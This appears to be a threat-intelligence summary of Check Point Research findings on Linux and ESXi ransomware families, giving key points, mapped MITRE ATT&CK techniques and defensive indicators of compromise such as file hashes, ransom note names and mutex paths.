Check Point Research analyzes Linux- and ESXi-targeting ransomware across 12 families, highlighting rising activity and cross-platform development. The study finds Linux variants are often encryption-focused and simpler than Windows counterparts, with OpenSSL and ChaCha20/RSA or AES/RSA common, and ESXi-focused tactics driving many campaigns. #Babuk #ESXi #Cl0p #HelloKitty #GwisinLocker #Monti #IceFire #Royal #LockBit #BlackCat
Keypoints
- Check Point Research documents a rise in ransomware targeting Linux systems and ESXi virtualization environments, including cross-platform tools built with Golang or Rust.
- Linux variants tend to be minimalist, often focusing on encryption with external scripts/configurations to drive the attack flow.
- The release of Babuk’s source code in 2021 accelerated multiple Linux ransomware families through code reuse and adaptation.
- OpenSSL is the predominant crypto library in Linux ransomware, with ChaCha20 and RSA or AES as common cryptographic patterns.
- Infection vectors for Linux/ESXi ransomware center on exposed services, vulnerability exploitation, webshells, stolen credentials, and brute-force access, rather than broad phishing campaigns typical of Windows threats.
- ESXi targets are especially attractive because compromising one ESXi host can impact many virtual machines, increasing ransom leverage.
- Double extortion is expanding in Linux ransomware, with groups sometimes skipping encryption to exfiltrate data for extortion campaigns (e.g., Cl0p).
MITRE Techniques
- [T1486] Data Encrypted for Impact – The samples reduce themselves to encryption code and rely on external configurations to perform encryption. “the extent to which the tool itself is simplified … reducing them to only the file encryption code”.
- [T1190] Exploit Public-Facing Application – Exploitation of vulnerabilities on exposed services is a main infection vector. “The exploitation of vulnerabilities found on exposed services is one of ransomware’s main means of infection.”
- [T1505.003] Web Shell – Webshells are used as backdoors to maintain access after initial compromise. “The Webshells act as backdoors and allow the actors to maintain access to these servers after reboots.”
- [T1110] Brute Force – Brute-force attacks against exposed services to gain server access. “brute force attacks trying to gain access to the servers through weak credentials.”
- [T1078] Valid Accounts – Access via stolen credentials, notably SSH, is highlighted as a growing infection path. “Gaining access with stolen credentials, for example, using SSH.”
- [T1053.005] Cron Jobs – Linux persistence often mirrors Windows Task Scheduler with Cron Jobs. “Cron Jobs (the equivalent of the Windows Task Scheduler) to gain persistence.”
- [T1041] Exfiltration Over C2 – Double extortion and data theft used for subsequent extortion campaigns. “Ransomware groups have been exploiting double extortion … to expose their victims’ sensitive information.”
- [T1070.004] File Deletion – Some ransomware self-delete after execution or remove traces. “the malware has the ability to self-delete after execution.”
Indicators of Compromise
- [Hash] File hash – b711579e33b0df2143c7cb61246233c7f9b4d53db6a048427a58c0295d8daf1c, d1ba6260e2c6bf82be1d6815e19a1128aa0880f162a0691f667061c8fe8f1b2c, and 1 more hashes
- [File Name] Potential ransom notes – How To Restore Your Files.txt, README_C_I_0P.TXT
- [Directory] Target directories (Linux) – /home, /root, and 2 more directories (e.g., /opt, /var/log)
- [File Path] Mutex indicators – /tmp/locker.pid, /tmp/.66486f04-bf24-4f5e-ae16-0af0fdb3d8fe